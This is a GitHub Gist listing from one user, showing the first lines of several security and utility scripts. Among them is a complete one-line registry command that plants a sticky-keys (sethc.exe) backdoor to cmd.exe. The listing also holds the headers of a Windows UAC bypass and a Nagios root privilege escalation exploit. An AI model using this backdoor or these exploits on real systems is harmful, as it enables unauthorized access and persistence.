Skip to content

Instantly share code, notes, and snippets.

View hackthebox-invite.sh
curl -s -XPOST https://www.hackthebox.eu/api/invite/generate | jq .data.code|sed 's/"//g'|base64 -d
View async_requests.py
#!/usr/bin/env python
# encoding: utf-8
"""
@author: xl7dev
"""
from aiohttp import ClientSession
import asyncio
import optparse
from pymongo import MongoClient
@xl7dev
xl7dev / request_c.py
Last active Oct 16, 2018
python request文件下载续传
View request_c.py
#!/usr/bin/env python
# encoding: utf-8
"""
@author: xl7dev
"""
import sys
import os
import cgi
import re
@xl7dev
xl7dev / DnsHelper.py
Created Feb 6, 2018
AsyncResolver for python3.5+
View DnsHelper.py
#!/usr/bin/env python
# encoding: utf-8
"""
@author: xl7dev
@time: 2018/2/6 上午11:40
for Python3.5+
"""
import random
import string
View rsa_encryp.py
#!/usr/bin/env python
# encoding: utf-8
import sys
import execjs
def runjs(password):
js = execjs.compile("""
var k = RSAUtils = {}
View auth_login_fortress.py
#!/usr/bin/env python
# encoding: utf-8
"""
@author: xl7dev
"""
import sys
import pyotp
import pexpect
import logging
@xl7dev
xl7dev / install-parallel-centos-6.sh
Created Oct 17, 2017
Install GNU parallel on CentOS 6
View install-parallel-centos-6.sh
#!/bin/bash
# Install GNU parallel on CentOS 6.
# http://software.opensuse.org//download.html?project=home%3Atange&package=parallel
cd /etc/yum.repos.d/
wget http://download.opensuse.org/repositories/home:tange/CentOS_CentOS-6/home:tange.repo
yum install parallel
# Alternative:
View UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
View cmd_backdoor
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
@xl7dev
xl7dev / nagios-root-privesc.sh
Created Dec 16, 2016
Nagios Exploit Root PrivEsc CVE-2016-9566
View nagios-root-privesc.sh
#!/bin/bash
#
# Nagios Core < 4.2.4 Root Privilege Escalation PoC Exploit
# nagios-root-privesc.sh (ver. 1.0)
#
# CVE-2016-9566
#
# Discovered and coded by:
#
# Dawid Golunski
You can’t perform that action at this time.